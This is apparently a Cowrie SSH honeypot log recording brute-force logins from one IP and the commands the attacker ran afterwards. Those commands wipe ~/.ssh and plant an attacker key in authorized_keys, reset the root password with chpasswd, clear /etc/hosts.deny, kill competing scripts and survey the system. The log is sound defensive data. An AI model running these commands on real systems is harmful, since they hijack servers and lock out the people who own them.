{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.258236Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.464334Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.465311Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60860,"dst_ip":"1.2.3.4","dst_port":22,"session":"f116e86691d6","protocol":"ssh","message":"New connection: 212.227.235.229:60860 (1.2.3.4:22) [session: f116e86691d6]","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.668245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.668836Z","src_ip":"212.227.235.229","session":"f116e86691d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:31.874368Z","src_ip":"212.227.235.229","session":"f116e86691d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37378,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3f963777730","protocol":"ssh","message":"New connection: 212.227.235.229:37378 (1.2.3.4:22) [session: e3f963777730]","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.269380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.270371Z","src_ip":"212.227.235.229","session":"e3f963777730"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:32.424200Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"echo \"root:P2hVoP3YVtX9\"|chpasswd|bash","message":"CMD: echo \"root:P2hVoP3YVtX9\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.424982Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.580096Z","src_ip":"212.227.235.229","session":"e3f963777730"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/670f7ac61bc93e567f805a6874426fb69f064a14078a5ea1f6da3d33adc78a60","size":21,"shasum":"670f7ac61bc93e567f805a6874426fb69f064a14078a5ea1f6da3d33adc78a60","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/670f7ac61bc93e567f805a6874426fb69f064a14078a5ea1f6da3d33adc78a60 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.677857Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:32.734960Z","src_ip":"212.227.235.229","session":"f116e86691d6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:33.709369Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T22:19:33.710106Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.login.failed","username":"mohammad","password":"123456789","message":"login attempt [mohammad/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:33.858767Z","src_ip":"212.227.235.229","session":"e3f963777730"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:33.942014Z","src_ip":"212.227.235.229","session":"f116e86691d6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T22:19:33.968794Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:33.969781Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60876,"dst_ip":"1.2.3.4","dst_port":22,"session":"655230758978","protocol":"ssh","message":"New connection: 212.227.235.229:60876 (1.2.3.4:22) [session: 655230758978]","sensor":"my-vps","timestamp":"2025-09-08T22:19:34.144406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:34.145787Z","src_ip":"212.227.235.229","session":"655230758978"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:34.348141Z","src_ip":"212.227.235.229","session":"655230758978"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:34.577910Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:19:34.578606Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:35.169294Z","src_ip":"212.227.235.229","session":"e3f963777730"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:35.190726Z","src_ip":"212.227.235.229","session":"655230758978"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:35.393867Z","src_ip":"212.227.235.229","session":"e5b16707b678"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:35.395082Z","src_ip":"212.227.235.229","session":"655230758978"}
{"eventid":"cowrie.session.closed","duration":12.43183445930481,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:35.507633Z","src_ip":"202.107.95.221","session":"3d3bdba3114e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:36.026608Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:36.297732Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:19:36.298421Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:36.553675Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:37.157758Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T22:19:37.158566Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T22:19:37.159254Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:38.354535Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44092,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a4451927bb9","protocol":"ssh","message":"New connection: 212.227.235.229:44092 (1.2.3.4:22) [session: 6a4451927bb9]","sensor":"my-vps","timestamp":"2025-09-08T22:19:38.600760Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:38.601816Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:38.663580Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T22:19:38.664234Z","src_ip":"212.227.235.229","session":"6d50e793150d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:38.775791Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.login.success","username":"root","password":"sasa123","message":"login attempt [root/sasa123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:19:39.507805Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:39.871904Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:39.872685Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:19:39.873768Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.048713Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:19:40.497090Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.497840Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.672262Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.673231Z","src_ip":"212.227.235.229","session":"6a4451927bb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44100,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ad050c37d37","protocol":"ssh","message":"New connection: 212.227.235.229:44100 (1.2.3.4:22) [session: 7ad050c37d37]","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.859086Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:40.859771Z","src_ip":"212.227.235.229","session":"7ad050c37d37"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:19:41.038724Z","src_ip":"212.227.235.229","session":"7ad050c37d37"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:19:41.794435Z","src_ip":"212.227.235.229","session":"7ad050c37d37"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:19:42.975625Z","src_ip":"212.227.235.229","session":"7ad050c37d37"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44104,"dst_ip":"1.2.3.4","dst_port":22,"session":"75283195644a","protocol":"ssh","message":"New connection: 212.227.235.229:44104 (1.2.3.4:22) [session: 75283195644a]","sensor":"my-vps","timestamp":"2025-09-08T22:19:43.162361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:19:43.163637Z","src_ip":"212.227.235.229","session":"75283195644a"}
